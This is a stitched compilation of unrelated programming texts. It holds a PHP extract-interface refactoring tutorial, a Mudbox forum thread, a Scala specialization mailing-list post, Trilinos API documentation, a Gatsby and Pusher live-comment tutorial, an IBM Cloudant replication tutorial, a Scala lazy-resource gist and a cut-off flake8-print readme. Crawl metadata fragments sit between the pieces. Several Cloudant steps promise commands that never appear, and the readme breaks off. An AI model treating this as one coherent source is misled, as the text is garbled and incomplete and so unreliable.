Outside-in TDD helps shape interfaces from the point of view of the caller instead of the callee. As such, these interfaces should reside in a separate folder/namespace from the implementing code (for the Dependency Inversion Principle).
What if a class has multiple calling points? It can possibly expose multiple interfaces, where every client depends on at most one of them and not on any additional methods.
Steps
- Create an empty interface. If you can only think of names such as Set and ISet for a class and interface, start by reserving the good name for the interface: Set and TreeBasedSet is better than the former pair.
- Declare common operations in the interface, with method signatures identical to the original. If only some operations are called by the client, only that subset should be copied into the interface.
- Add implements keywords to tie existing concrete classes to the interface.
- Simplify the client code by making it dependent on the interface where possible.
There are multiple examples of the last step:
- the tests can now use a mock or a stub easily (even coded by hand instead of a generated one), since starting from interface you'll have a small set of methods to override.
- Type hints can be written referring to the interface name whenever the client code calls only the methods listed in the interface.
- renaming the interface and the concrete classes to reflect a role (in the interface) and implementation peculiarities (in the concrete classes).
- Add or drop methods in the contract to fit the desires of the caller.
- Extract some functionality into a Decorator or a Composite, which are multiple implementation of an interface.
Example
In the initial state, the Money presenter object is depending on a concrete class, EuroLocale.
<?php
class ExtractInterface extends PHPUnit_Framework_TestCase
{
    public function testShouldDisplayAMoneyAmount()
    {
        $locale = new EuroLocale();
        $money = new Money("42");
        $this->assertEquals("42 €", $money->display($locale));
    }
}

class EuroLocale
{
    public function format($amount)
    {
        return $amount . ' €';
    }
}

class Money
{
    private $amount;

    /**
     * @param string $amount to keep precision
     */
    public function __construct($amount)
    {
        $this->amount = $amount;
    }

    public function display(EuroLocale $locale)
    {
        return $locale->format($this->amount);
    }
}
We create an interface, Locale, and just the single public method is extracted. Anything more would not be shown in this example, and won't be brought up into the interface.
interface Locale
{
    /**
     * @return string
     */
    public function format($amount);
}
We add an implements keyword, and simplify the type hint dependency to target just Locale.
interface Locale
{
    /**
     * @return string
     */
    public function format($amount);
}

class EuroLocale implements Locale
{
    public function format($amount)
    {
        return $amount . ' €';
    }
}

class Money
{
    private $amount;

    /**
     * @param string $amount to keep precision
     */
    public function __construct($amount)
    {
        $this->amount = $amount;
    }

    public function display(Locale $locale)
    {
        return $locale->format($this->amount);
    }
}
Usually a dependency on a concrete class, which may have a dozen different methods, does not let us refactor tests to introduce Test Doubles. This happens because we are unsure about which methods we should redefine: which are called in this test method? And by Money objects in general?
Now that we have an interface, we define explicitly that only format() is called, even if EuroLocale may have many others. So we can break the tests in two, one targeting Money and the other EuroLocale. Note the order of the unit tests: they are completely independent, so we can test (and thus develop) Money first.
<?php

class ExtractInterface extends PHPUnit_Framework_TestCase
{
    public function testShouldFormatItsAmountBeforeDisplayingIt()
    {
        $locale = $this->getMock('Locale');
        $locale->expects($this->once())
               ->method('format')
               ->with("42")
               ->will($this->returnValue('42 SIMBOL'));
        $money = new Money("42");
        $this->assertEquals("42 SIMBOL", $money->display($locale));
    }

    public function testShouldFormatAnAmountWithTheEuroSighn()
    {
        $locale = new EuroLocale();
        $this->assertEquals("42 €", $locale->format("42"));
    }
}
In the real world, there would have been dozens of tests involving both objects, with a lot of setup code and machinery. Interfaces let us break direct dependencies and test classes in real isolation, an approach that scales better to many tests. For example, in the final version every test for a new formatting option (like 42.00 or 10,000.00 EUR) needs only to create a string instead of a Money object. Equivalently, any test for a new user of format() does not have to care about particular formatting rules.
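The same move carries over to other languages. Below is a sketch of the idea in Python (illustrative only, not from the original article), with typing.Protocol standing in for the extracted interface and unittest.mock providing the Test Double:

```python
from typing import Protocol
from unittest.mock import Mock


class Locale(Protocol):
    """The extracted interface: only the one method callers actually use."""
    def format(self, amount: str) -> str: ...


class EuroLocale:
    def format(self, amount: str) -> str:
        return amount + " €"


class Money:
    def __init__(self, amount: str) -> None:
        self.amount = amount  # kept as a string to preserve precision

    def display(self, locale: Locale) -> str:
        # Money depends only on the Locale role, not on EuroLocale
        return locale.format(self.amount)


# Money is tested in isolation against a Test Double...
locale = Mock()
locale.format.return_value = "42 SYMBOL"
assert Money("42").display(locale) == "42 SYMBOL"
locale.format.assert_called_once_with("42")

# ...and EuroLocale is tested separately, without Money
assert EuroLocale().format("42") == "42 €"
```

As in the PHP version, each new formatting rule can now be tested with plain strings, and each new caller of format() needs no knowledge of any particular locale.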
Filippo Tessarotto replied on Wed, 2012/01/18 - 6:54am
I consider this refactoring one of the most important:
Where "clarify" refers both to the code user and the code developer.
getting 'import as layer' to work
pavstudio
03-30-2007, 04:00 AM
Hi,
I'm using Mudbox v1.03 and am having trouble using the 'import as layer' feature. Every time I try it, I get an error. I've tried all of the settings and have tried it on multiple computers. Has anyone else had this problem? If someone who has used this successfully could give me a quick run-through of how they do it, I'd appreciate it.
Thanks in advance!
oglu
03-30-2007, 07:53 PM
try the newest version... 1.06..
maybe your mesh isn't clean, or it has bad UVs..?
fx81
03-30-2007, 09:01 PM
Import as layer was fine in 1.03 as well. You don't need the new 1.06 upgrade for that.
If you are using Maya, check the second tutorial (Maya Mudbox Workflow 2). It should explain.
Avoiding boxing/unboxing with specializations and numerics
Thu, 2011-12-01, 21:34
Oops! Could this please be moved to scala-user! I posted to the wrong list by accident.
Re: Re: Avoiding boxing/unboxing with specializations and numerics
Just forward your original message to scala-user. (You can edit the subject and body so it doesn't look forwarded, if you like.)
On Thu, Dec 1, 2011 at 3:34 PM, marc <millstone [at] gmail [dot] com> wrote:
Oops! Could this please be moved to scala-user! I posted to the wrong list by accident.
I thought now would be a good time to post the following: currently, much of my code is hardcoded to Double, and I wanted to generalize this to handle Doubles or Ints without a performance loss.

Below is a simple example I wrote up demonstrating the problems I am experiencing (as well as javap output).

This code simply creates a class that accepts a List[T] and will compute its sum. If T is an Int, we want an Int back, and similarly if T is a Double. Observations: 1) It seems we have to go through Numeric implicitly to handle this use case, requiring the use of plus and zero as opposed to + and 0. 2) Although the class itself is specialized, we have to pay a boxing/unboxing penalty for the use of the plus operator in the recursion. Obviously, this is inherently tied to having to go through the implicit conversion to Numeric.

Obviously, this example is very simple, but I hope it is so simple that some of these micro-optimization techniques can be better explained.
Is this just the way it is or am I missing something with using this functionality?
Thank you all in advance,
import scala.annotation.tailrec

object Run {
  def main(args: Array[String]) {
    val A = new MList(List(1., 2., 3.))
    val B = new MList(List(1, 2, 3))
    println(A.sum)
    println(B.sum)
  }
}
class MList[@specialized (Int, Double) T: Numeric](a: List[T]) {
  def sum(implicit num: Numeric[T]) = {
    import num._
    @tailrec
    def sumHelper(a: List[T], total: T): T = {
      if (a.length == 0) total
      else sumHelper(a.tail, plus(a.head, total))
    }
    sumHelper(a, zero)
  }
}
javap -c -private MList\$mcI\$sp output
private final int sumHelper$3(scala.collection.immutable.List, int, scala.math.Numeric);
  Code:
    0: aload_1
    1: invokeinterface #56, 1; //InterfaceMethod scala/collection/LinearSeqOptimized.length:()I
    6: iconst_0
    7: if_icmpne 12
   10: iload_2
   11: ireturn
   12: aload_1
   13: invokeinterface #61, 1; //InterfaceMethod scala/collection/TraversableLike.tail:()Ljava/lang/Object;
   18: checkcast #63; //class scala/collection/immutable/List
   21: aload_3
   22: aload_1
   23: invokeinterface #68, 1; //InterfaceMethod scala/collection/IterableLike.head:()Ljava/lang/Object;
   28: iload_2
   29: invokestatic #50; //Method scala/runtime/BoxesRunTime.boxToInteger:(I)Ljava/lang/Integer;
   32: invokeinterface #72, 3; //InterfaceMethod scala/math/Numeric.plus:(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
   37: invokestatic #38; //Method scala/runtime/BoxesRunTime.unboxToInt:(Ljava/lang/Object;)I
   40: istore_2
   41: astore_1
   42: goto 0
#include <GLpApp_AdvDiffReactOptModel.hpp>
Inheritance diagram for GLpApp::AdvDiffReactOptModel:
The model evaluator subclass is used to represent the simulation-constrained optimization problem:
min g(x,p) s.t. f(x,p) = 0;
where:
- x is the vector of discretized concentrations of the species in the 2D domain.
- p is the global vector of coefficients of a sine series basis (see B_bar below).
- f(x,p) = A*x + reactionRate*Ny(x) + B*(B_bar*p) is the discretized 2D diffusion/reaction PDE.
- g(x,p) = 0.5 * (x-q)'*H*(x-q) + 0.5*regBeta*(B_bar*p)'*R*(B_bar*p) is the least-squares objective function.
- A is the discretized Laplacian operator for the diffusion part of the PDE state equation. This matrix is constant, square, and singular.
- B is the sensitivity of the flux boundary conditions. This is a constant rectangular matrix.
- B_bar are the sine series coefficients with a column dimension of np.
- Ny(x) gives the nonlinear terms for the discretized reaction over the 2D domain.
- reactionRate is the relative reaction rate, which must take on a non-zero value to form a solvable problem.
- H is the symmetric positive definite mass matrix for the problem (i.e. the discretization of the inner product operator over the 2D domain).
- q is a matching or target vector for the state x over the 2D domain of the problem.
- R is the symmetric positive definite discretization of the inner product of the flux function over the boundary of the 2D domain.
- regBeta is a regularization parameter that must be greater than zero.
The nuts and bolts of the implementation for this problem are contained in the C++ class GLpApp::GLpYUEpetraDataPool, which was originally implemented by Denis Ridzal while a student at Rice University. The class GLpApp::GLpYUEpetraDataPool implements the basic operators and nonlinear functions, but this class puts them together to form a valid model in terms of a model evaluator interface.
This example problem demonstrates a few different aspects of the EpetraExt::ModelEvaluator interface:

- How to manage parallel vector data. The state variables in x are managed as fully distributed parallel data, while the flux sine-series parameter coefficients p are managed as locally replicated data.
- Shared computation between the objective function g(x,p) and the simulation equality constraints f(x,p), and between their derivatives. The intermediate vector B_bar*p is computed only once and is shared by the computation of g and f. The intermediate vector R*(B_bar*p) is computed once and shared between the computation of g and DgDp.
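The sharing described above can be sketched outside of Trilinos. In the following NumPy fragment (dimensions, matrices, and the reaction term are small stand-ins, not the real discretization), f and g reuse the intermediates B_bar*p and R*(B_bar*p):

```python
import numpy as np

rng = np.random.default_rng(0)
nx, npar = 6, 3  # state and parameter dimensions (illustrative)

A = rng.standard_normal((nx, nx))    # stand-in for the discretized Laplacian
B = rng.standard_normal((nx, npar))  # stand-in for the flux-sensitivity matrix
B_bar = np.eye(npar)                 # sine-series basis coefficients
H = np.eye(nx)                       # mass matrix (SPD)
R = np.eye(npar)                     # boundary inner product (SPD)
q = rng.standard_normal(nx)          # matching target for the state
reactionRate, regBeta = 1.0, 0.1


def Ny(x):
    # stand-in for the nonlinear reaction terms
    return x ** 2


def eval_model(x, p):
    Bp = B_bar @ p   # computed once, shared by f and g
    RBp = R @ Bp     # computed once, shared by g and DgDp
    f = A @ x + reactionRate * Ny(x) + B @ Bp
    g = 0.5 * (x - q) @ H @ (x - q) + 0.5 * regBeta * Bp @ RBp
    return f, g
```

The point of the structure is that a single evaluation pass can hand back both the constraint residual and the objective without recomputing the shared products, which is exactly what the model evaluator interface encourages.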
The functions AdvDiffReactOptModel(), createInArgs(), createOutArgs(), and evalModel() are fairly cleanly written and are appropriate to be studied in order to show how to implement other parallel simulation-constrained problems based on Epetra objects.
The mesh for the 2D domain can either be read in from a mesh data file, given the file's name, or be generated automatically on a square 2D domain.
The program triangle can be used to generate meshes for arbitrary 2D geometries, and then metis can be used to partition the mesh into multiple domains. Instructions for how to use triangle and metis to generate meshes are described ???here???.
Instead of reading in a mesh file, a square 2D mesh can be automatically generated given just the lengths in the x and y directions and the number of local elements in each direction. Currently, the square mesh is only partitioned in the x direction and therefore will not demonstrate great parallel scalability for large numbers of processors, due to excessive amounts of shared boundary between processes.
ToDo: Finish Documentation!
Definition at line 119 of file GLpApp_AdvDiffReactOptModel.hpp. | http://trilinos.sandia.gov/packages/docs/r7.0/packages/epetraext/doc/html/classGLpApp_1_1AdvDiffReactOptModel.html | CC-MAIN-2014-15 | en | refinedweb |
Add live comments in Gatsby
You will need Node and npm or Yarn installed on your machine. A basic understanding of JavaScript will be helpful.
According to Wikipedia, a static web page (sometimes called a flat page or stationary page) is a web page that is delivered to the user exactly as stored, in contrast to dynamic web pages, which are generated by a web application.
Gatsby is a modern static site generator that allows you to build static web pages using React and GraphQL. Getting started with Gatsby is pretty easy, and its installation is an npm install or yarn install away.
Today we’ll be adding a realtime comment section to the sports blog we’ll be building. We’ll call our blog the “Football transfer buzz with Gordon Mc-gossip”.
Our application will contain a post and allow users to leave comments and everyone gets to see it in realtime.
Prerequisites
- Kindly ensure you have Node and npm or Yarn installed on your machine before moving past this section. These will be needed for running and managing the dependencies needed by our application.
- Also, no knowledge of React is required, but a basic understanding of JavaScript may be helpful.
- Pusher: this is a framework that allows you to build realtime applications with its easy-to-use pub/sub messaging API.
- Gatsby: this is a static site generator (minimum version "gatsby": "^1.9.247").
Install Gatsby
Installing Gatsby is pretty easy once you have Node installed on your machine. Simply run:
# for npm users
npm i -g gatsby-cli

# for yarn users
yarn global add gatsby-cli
This Gatsby CLI comes with a few helpful commands that can help you build and test your apps locally.
Create your app
To create our project, simply run:
# new gatsby project
gatsby new gatsby-site-pusher
This will create our new project Transfer-Buzz and install its dependencies. If you cd into your new project directory, it will look like this.

Most of the work we'll be doing will be in the src/ directory. The components we'll create will go into the src/components directory, and pages will go into the src/pages directory.
Install dependency:
# for npm users
npm i --save pusher-js

# for yarn users
yarn add pusher-js
Get our Pusher credentials
If you don’t have a Pusher account already, kindly create one here. Once you have an account, simply head down to your dashboard and create an app. Once that is done, click on App Keys and note your credentials. We’ll be needing them in a bit.
Creating our app components
The first component we'll create is our CommentList component. This will be responsible for listing the comments left by users.
// src/components/comment-list.js
import React from 'react'

export default ({comments}) => {
  comments = comments.map((comment, i) => (
    <div key={i} style={{ padding: '5px', border: '1px solid grey' }}>
      <p><strong>{comment.author}:</strong></p>
      <p>{comment.message}</p>
    </div>
  ))

  return (
    <section>
      <strong>Comments: </strong>{comments}
    </section>
  )
}
This simply takes an array of comments with attributes {author, message} and returns a CommentList component.

Next is the Comment component, which will have a form for accepting new comments and will list comments below.
// src/components/comment.js
import React, { Component } from 'react'
import CommentList from './comment-list'
import Pusher from 'pusher-js'

/**
 * initialize pusher with your credentials.
 * Get 'key' from pusher dashboard
 */
const pusher = new Pusher('key', {
  cluster: 'eu',
  encrypted: true
})

// subscribe your pusher instance to the channel 'sport-buzz-news'
const channel = pusher.subscribe('sport-buzz-news')

/* global fetch */
export default class Comment extends Component {
  constructor (props) {
    super(props)
    this.state = {
      comments: [],
      author: '',
      message: ''
    }
  }

  /**
   * This will load comments from the server on app startup,
   * and also subscribe our app to listen for updates
   */
  async componentDidMount () {
    const comments = await fetch('http://localhost:8080/comments')
      .then(res => res.json())
    this.setState({comments: [...comments, ...this.state.comments]})
    this.receiveUpdateFromPusher()
  }

  componentWillUnmount () {
    pusher.unsubscribe('sport-buzz-news')
  }

  /**
   * add new comments to the top of the list
   * once there's an update
   */
  receiveUpdateFromPusher () {
    channel.bind('new-comment', comment => {
      this.setState({ comments: [comment, ...this.state.comments] })
    })
    console.log('app subscription to event successful')
  }

  handleChange (type, event) {
    if (type === 'author') {
      this.setState({author: event.target.value})
      return
    }
    if (type === 'message') {
      this.setState({message: event.target.value})
    }
  }

  /**
   * post comment to the server
   */
  async postComment (author, message) {
    await fetch('http://localhost:8080/comment', {
      body: JSON.stringify({author, message}),
      method: 'POST',
      headers: {
        'user-agent': 'Mozilla/4.0 ',
        'content-type': 'application/json'
      }
    })
  }

  handleSubmit (event) {
    event.preventDefault()
    this.postComment(this.state.author, this.state.message)
    this.setState({author: '', message: ''})
  }

  render () {
    return (
      <div>
        <form onSubmit={this.handleSubmit.bind(this)}>
          <label>
            Name:
            <input type='text' value={this.state.author}
              onChange={this.handleChange.bind(this, 'author')} />
          </label>
          <label>
            <br />
            Message:
            <textarea type='text' value={this.state.message}
              onChange={this.handleChange.bind(this, 'message')} />
          </label>
          <br />
          <input type='submit' value='Submit' />
        </form>
        <CommentList comments={this.state.comments} />
      </div>
    )
  }
}
Here, when the component gets mounted, we try to load previous comments from the server and pass that data as props to the CommentList component.
Note: please remember to update placeholders with your pusher credentials.
Putting content on our page
Open your src/pages/index.js file, which should already exist. You should replace its content with this:
// src/pages/index.js
import React from 'react'
import Comment from '../components/comment'

const IndexPage = () => (
  <div>
    <h1>Leroy Aziz Sané left out of German squad for the world cup</h1>
    <p>
      A lot of talk is currently ongoing about the Manchester City winger
      Leroy Sane being left out of the German team. He was a prolific player
      this season, with Man City winning the premier league, and the
      significant contribution he brought to the team in front of goal was
      clear. The decision by the German coach, Low, to leave him out of the
      squad list was totally unexpected. Football really is a funny sport.
    </p>
    <p>
      Let me know your thoughts in the comment section below
    </p>
    <Comment />
  </div>
)

export default IndexPage
This contains a post we made and the Comment component we imported above.
Getting data in Gatsby
Gatsby uses GraphQL for getting data. It could be from any source. There are a few files where changes need to be made to get data. We have gatsby-node.js, gatsby-browser.js, and gatsby-config.js, among others.

What we're concerned about right now is gatsby-config.js. It is responsible for passing data down to our src/components/header.js component. This gets data locally from the file, and it's an easy way to initialize your application with data.

Open up your src/components/header.js file and you should see this:
// src/components/header.js
import React from 'react'
import Link from 'gatsby-link'

const Header = ({ siteTitle }) => (
  <div>
    <h1>
      <Link to="/">{siteTitle}</Link>
    </h1>
  </div>
)

export default Header
It takes a prop called siteTitle, which was exported from the file gatsby-config.js.

Feel free to go ahead and change the value for title in gatsby-config.js to 'Football transfer buzz with Gordon Mc-Gossip'.
Setting up the server
Comments sent by users need to go somewhere; that's what the server is for. It will save the comment and publish it to Pusher, which will trigger an update to all clients subscribed to that channel and listening for that event.

First, we'll need to add the dependencies needed by our server.
# for yarn users
yarn add express body-parser cors pusher

# for npm users
npm i express body-parser cors pusher
Create the file server.js and add the following:
// server.js
const express = require('express')
const bodyParser = require('body-parser')
const cors = require('cors')
const Pusher = require('pusher')

const app = express()
const port = 8080

app.use(cors())
app.use(bodyParser.json())

/**
 * initialize pusher with your credentials
 * ('appId', 'key' and 'secret' come from your pusher dashboard)
 */
const pusher = new Pusher({
  appId: 'appId',
  key: 'key',
  secret: 'secret',
  cluster: 'eu',
  encrypted: true
})

let comments = [
  { author: 'robo', message: 'i totally didn\'t see that coming' }
]

/**
 * receive new comment from the client
 * update the comments array with the new entry
 * publish update to Pusher
 */
app.post('/comment', function (req, res) {
  const {author, message} = req.body
  comments = [...[{author, message}], ...comments]
  pusher.trigger('sport-buzz-news', 'new-comment', {author, message})
  res.sendStatus(200)
})

// send all comments to the requester
app.get('/comments', function (req, res) {
  res.json(comments)
})

app.listen(port, function () {
  console.log('Node app is running at localhost:' + port)
})
Here, we initialize Pusher with our credentials gotten from our dashboard. When we get a request on localhost:8080/comments, we return all comments received so far, and we accept new comments sent to POST localhost:8080/comment.
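What Pusher does for us here is plain publish/subscribe: the server triggers an event on a channel, and every client handler bound to that event runs. A minimal in-memory sketch of those semantics (illustrative only; this is not the Pusher API):

```python
from collections import defaultdict


class Channel:
    """Tiny stand-in for a channel: bind() registers event handlers,
    trigger() fans a payload out to every handler for that event."""

    def __init__(self):
        self.handlers = defaultdict(list)

    def bind(self, event, handler):
        self.handlers[event].append(handler)

    def trigger(self, event, payload):
        for handler in self.handlers[event]:
            handler(payload)


# every subscribed client binds to the same event...
comments = []
channel = Channel()
channel.bind('new-comment', lambda c: comments.insert(0, c))

# ...so one trigger on the server side updates all of them at once
channel.trigger('new-comment', {'author': 'robo', 'message': 'hi'})
```

In the real app, the trigger happens in the POST /comment handler and the bind happens in receiveUpdateFromPusher(), with Pusher relaying the event between the two processes.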
Running the app
We’ll use one of Gatsby’s helpful CLI commands to start our application. Simply run:
# gatsby cli command
gatsby develop
This will start our application on port 8000; it can be accessed at http://localhost:8000
You’ll also need to start the server by running:
# start node server
node server.js
Our server application will run on http://localhost:8080, and all API calls will go there.
More
Gatsby allows you to export your site as static content when going to production. It can prefetch your data from any data source and bundle it into the generated static files.
To do that, simply run:
# make production build
gatsby build
Gatsby will perform an optimized production build for your site generating static HTML and per-route JavaScript code bundles.
Conclusion
We’ve been able to build a simple blog application with a live comment section. This was done using Pusher and Gatsby.
The repo for this tutorial lives here. Feel free to contribute.
June 12, 2018
by Christian Nwamba | https://pusher.com/tutorials/realtime-comments-gatsby/ | CC-MAIN-2022-21 | en | refinedweb |
Get the Most Out of IBM Cloudant with Cross-Region Replication
How to achieve full two-way replication between two data centre regions with IBM Cloudant.
If you run applications with customers in multiple regions of the world or run apps that are required to be resilient to the failure of whole data centre regions, you should consider IBM Cloudant for your data store.
IBM Cloudant has unique cross-region replication capabilities that allow you to maintain identical datasets that are always in sync in different parts of the world. That way, your users can be served faster by retrieving data from the dataset closest to them, and you can seamlessly failover between regions in the case of disaster or loss of connectivity.
Additionally, replicated datasets allow you to handle more traffic. If one region is configured to handle 500 queries per second, replicating to an identical second Cloudant service would add another 500 queries per second.
The ease of use and reliability of IBM Cloudant replication sets it apart from most other managed database services. And because of Cloudant's conflict-handling capabilities, you can rest assured that data is never lost, even if the same document is updated simultaneously from two different regions into replicated databases.
Obviously, a replicated service will increase your infrastructure costs (because you are provisioning double the capacity), but if these kinds of benefits are valuable to you, then the cost-benefit analysis will still be in your favour.
Two-way replication between two data centre regions
In this article, we will take you through the simple steps required to achieve full two-way replication between two data centre regions. These principles can be extended to replicate between three or more regions as well (see more details about complex replication topologies in this article).
We will also introduce a basic script to monitor replication and check that things are running smoothly. This script will be hosted on the IBM Code Engine service and run on a regular (cron) basis.
The following is what you will build:
This tutorial should take you less than an hour to complete. It will not be entirely cost-free because you can only set up one Cloudant service on the free tier and you will need two of them. If you deprovision the services after completing the tutorial, however, you should not have to pay more than a few dollars.
What you will need
- An IBM Cloud pay-as-you-go account.
- The IBM Cloud CLI (you also need to make sure that it is logged into your account).
- Git.
- Node.js and npm.
- Terraform: We will be using Terraform to deploy all the required infrastructure.
- Docker: We will be using Docker to create the images that will run your code in Code Engine — make sure you are logged into your Docker account.
- jq: This is a command-line utility to manipulate JSON data files.
- ccurl (or CouchDB curl) a command line utility to access couch-compatible services.
- Access to a Mac or Linux terminal.
To get the most out of this tutorial, you will need to be familiar with the basics of NodeJS, Terraform and Docker. But there is no deep expertise required of any of them.
Tutorial steps
- Create two instances of IBM Cloudant in separate geographical regions.
- Create secure replication access between them using an IAM ServiceID.
- Create one database in each Cloudant instance.
- Create a simple NodeJS script that sets up replication between these databases and then monitors the replication. This will be deployed to Code Engine, where it will run every minute.
- Change the data in the databases and watch it replicate.
Step 1: Obtain an API key to deploy infrastructure to your account
You will need some credentials to be able to deploy infrastructure programmatically using Terraform. Follow the steps in this document to create an API key and make a note of it for Step 2.
Step 2: Clone the repo and cd into the Terraform directory
Now you are ready to create all the necessary parameters to run the infrastructure creation process from your machine. In a terminal, type the following:
This will copy all the project files into your local machine inside a directory called
cloudant-replication-in-a-box.
Now create a document called terraform.tfvars with the following fields:
The terraform.tfvars document contains variables that you may want to keep secret so it is ignored by the GitHub repository.
Step 3: Create the infrastructure
In this step, you will create the required infrastructure inside your IBM Cloud account.
TL;DR — Run the Terraform script:
In a bit more detail: The Terraform folder contains a number of simple scripts:
- main.tf tells Terraform to use the IBM Cloud.
- variables.tf contains the variable definitions whose values will be populated from terraform.tfvars.
- cloudant.tf creates the Cloudant DB instances in two different regions and some credentials that we will use later to access them.
- registry.tf creates the Container Registry that will hold your container images for running in Code Engine.
- iam.tf creates the access key that is needed to interact with the Container Registry and the key that will be used to read and write between the Cloudant databases.
It will take several minutes for the databases and other resources to be ready, but you should now have two Cloudant database instances, a Container Registry namespace for your container images and some Identity and Access Management (IAM) credentials. You can check by visiting the Resources section of your IBM Cloud account.
Step 4: Create Cloudant databases and deploy monitoring scripts to Code Engine
Another thing the Terraform script does is output a bunch of configuration variables that we will now use.
We will run a bash script (build.sh) that takes some of that output and uses it to create a database called users in both of your Cloudant instances. It will also deploy a replication monitoring script (monitor.js) to Code Engine that will run every minute and make sure that replication is working correctly.
Run the build script — but before you do, are you logged into the IBM Cloud CLI and Docker?
Go into the root of the project and type the following:
How replication works in Cloudant
Replication happens between databases (in our case, between the users databases in the Dallas and London regions). Every Cloudant instance has a special database in it called _replicator that contains documents with replication instructions for each database you want to replicate. Each of these documents has a source database (where you are replicating from) and a target database (where you are replicating to). It also contains any necessary credentials that allow replication to occur between these databases. Here's an example of one such document:
The monitoring script monitor.js is a simple NodeJS script. It builds up a replication document like the one above with data passed in as environment variables.

Then it checks whether the _replicator database already contains this document (from its _id). If it does not, it uploads the document to the _replicator database. So the first time your script runs on Code Engine, the document will not exist and will get uploaded, thereby kicking off the replication process.
After that, the document will exist, but every time the script retrieves it, it will check what state it is in. If it is in any kind of error state, it will attempt to upload the document again, thereby trying to re-start the replication process. Error states can be caused by things like temporary losses of connectivity, expired credentials or other factors. This script is very simple, but it could be made more clever by, for example, generating alerts when it finds error states.
The script is running twice, once using London as the source and Dallas as the target and once using Dallas as the source and London as the target. Replication is happening both ways.
Note here that both documents could be uploaded to the same Cloudant instance; that is, the system knows that it needs to "push" to some other database and also "pull" from it. The best-practice recommendation is to have your replication documents in the instance that is the least active one. So if, for example, your London Cloudant is taking most of the application traffic, then put your replication documents in the Dallas instance. In this case, for simplicity, we have placed one document in each database.
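The monitor's decision logic is small enough to sketch. The Python version below is illustrative only: the IAM "auth" shape and the _replication_state values are assumptions based on the CouchDB/Cloudant replicator, so check the exact field names against the Cloudant documentation before relying on them.

```python
def replication_doc(doc_id, source_url, target_url, api_key):
    """Build the desired _replicator document (field names assumed
    from the CouchDB/Cloudant replicator; verify against the docs)."""
    return {
        "_id": doc_id,
        "source": {"url": source_url, "auth": {"iam": {"api_key": api_key}}},
        "target": {"url": target_url, "auth": {"iam": {"api_key": api_key}}},
        "continuous": True,
    }


def needs_restart(existing_doc):
    """Re-upload when the document is missing or stuck in an error state."""
    if existing_doc is None:
        return True
    return existing_doc.get("_replication_state") in ("error", "failed")


assert needs_restart(None)
assert needs_restart({"_id": "r1", "_replication_state": "error"})
assert not needs_restart({"_id": "r1", "_replication_state": "triggered"})
```

Running this check once a minute from Code Engine is what keeps a transient failure (expired credentials, lost connectivity) from silently stopping replication.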
Step 5: Watch your data replicate
The easiest way to see your data replicate is in the Cloudant user interface.
From your resources list, click on the Launch Dashboard link of your cloudantDallas and cloudantLondon instances (open them in separate tabs so you can move between them):
From one of them (it doesn't matter which), click on the users database and then on the Create Document button. In the editor, add a few fields and save the document. For example:
Now go to the other Cloudant instance, click into the users database, and you should see the above document in there already. It's that quick.
Summary
In this tutorial we have demonstrated how easy it is to set up two-way replication between IBM Cloudant instances in two regions of the world. We have also implemented a basic monitoring script that ensures replication is working.
If high availability, whole-region disaster recovery and customer satisfaction are important factors in your application design, then you should be considering IBM Cloudant as your database.
Remember to decommission your resources so that you don't get charged additional fees. In the Terraform directory, type the following:
To remove the IBM Cloud Code Engine project, type the following:
If you want to get started with IBM Cloud Databases, check out all our current promotions here.
Unsafe Lazy Resource.scala
I need an impure way (no IO) to create a resource atomically only once and later be able to know if it was created or not, so I can close this resource safely. 🤔
Jules Ivanic (@guizmaii), August 2, 2021
import scala.util.control.NonFatal

/** Builds a "closeable" resource that's initialized on-demand.
  *
  * Works like a `lazy val`, except that the logic for closing
  * the resource only happens in case the resource was initialized.
  *
  * NOTE: it's called "unsafe" because it is side-effecting.
  * See homework.
  */
final class UnsafeLazyResource[A](
  initRef: () => A,
  closeRef: A => Unit,
) extends AutoCloseable {

  /** Internal state that works like a FSM:
    * - `null` is for pre-initialization
    * - `Some(_)` is an active resource
    * - `None` is the final state, a closed resource
    */
  @volatile private[this] var ref: Option[A] = null

  /**
    * Returns the active resource. Initializes it if necessary.
    *
    * @return `Some(resource)` in case the resource is available,
    *         or `None` in case [[close]] was triggered.
    */
  def get(): Option[A] =
    ref match {
      case null =>
        this.synchronized {
          if (ref == null) {
            try {
              ref = Some(initRef())
              ref
            } catch {
              case NonFatal(e) =>
                ref = None
                throw e
            }
          } else {
            ref
          }
        }
      case other =>
        other
    }

  override def close(): Unit =
    if (ref ne None) {
      val res = this.synchronized {
        val old = ref
        ref = None
        old
      }
      res match {
        case null | None => ()
        case Some(a)     => closeRef(a)
      }
    }
}
Example:
import java.io._

def openFile(path: File): UnsafeLazyResource[InputStream] =
  new UnsafeLazyResource(
    () => new FileInputStream(path),
    in => in.close()
  )

val lazyInput = openFile(new File("/tmp/file"))

// .. later
try {
  val in = lazyInput.get().getOrElse(
    throw new IllegalStateException("File already closed")
  )
  //...
} finally {
  lazyInput.close()
}
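For readers coming from other languages, the same three-state FSM translates directly. Here is a Python sketch (not from the original post), with a lock-protected attribute playing the role of the @volatile var and a sentinel object standing in for null:

```python
import threading

_UNINIT = object()  # pre-initialization sentinel (the `null` state)


class UnsafeLazyResource:
    """Same FSM: _UNINIT -> live value -> None (closed)."""

    def __init__(self, init_ref, close_ref):
        self._init_ref = init_ref
        self._close_ref = close_ref
        self._lock = threading.Lock()
        self._ref = _UNINIT

    def get(self):
        if self._ref is _UNINIT:
            with self._lock:
                if self._ref is _UNINIT:  # double-checked under the lock
                    try:
                        self._ref = self._init_ref()
                    except BaseException:
                        self._ref = None  # failed init counts as closed
                        raise
        return self._ref  # None means "closed"

    def close(self):
        with self._lock:
            old, self._ref = self._ref, None
        if old is not _UNINIT and old is not None:
            self._close_ref(old)


# usage: created only on first get(), closing callback runs at most once
events = []
res = UnsafeLazyResource(lambda: events.append("open") or "handle",
                         lambda h: events.append("close"))
assert res.get() == "handle"
res.close()
res.close()  # idempotent
assert events == ["open", "close"]
```

As in the Scala version, get() after close() reports the closed state instead of re-initializing, and the closing callback is invoked at most once.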
Homework
- Try using an AtomicReference instead of synchronizing a var — not as obvious as you'd think — initialization needs protection, you'll need an indirection 😉
- Try designing a pure API with Cats Effect’s Resource (you might need Ref and Deferred for your internals too)
Written by Alexandru Nedelcu
print statement checker plugin for flake8
Flake8 print plugin
Check for print statements in Python files.
This module provides a plugin for flake8, the Python code checker.
Installation
You can install or upgrade flake8-print with these commands::

    $ pip install flake8-print
    $ pip install --upgrade flake8-print
Plugin for Flake8
When both flake8 2.4.1 and flake8-print are installed, the plugin is available in flake8::

$ flake8 --version
